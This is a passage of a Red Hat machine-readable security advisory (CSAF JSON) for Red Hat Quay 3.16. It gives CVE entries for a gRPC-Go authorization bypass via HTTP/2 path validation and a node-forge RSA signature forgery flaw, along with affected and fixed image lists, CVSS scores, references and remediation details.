            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2449833"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "RHBZ#2449833",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
          "url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
        }
      ],
      "release_date": "2026-03-20T22:23:32.147000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
    },
    {
      "cve": "CVE-2026-33894",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-27T21:02:52.462999+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452464"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452464",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33894",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc2313#section-8",
          "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
        },
        {
          "category": "external",
          "summary": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE",
          "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
        },
        {
          "category": "external",
          "summary": "https://www.rfc-editor.org/rfc/rfc8017.html",
          "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
        }
      ],
      "release_date": "2026-03-27T20:45:49.583000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
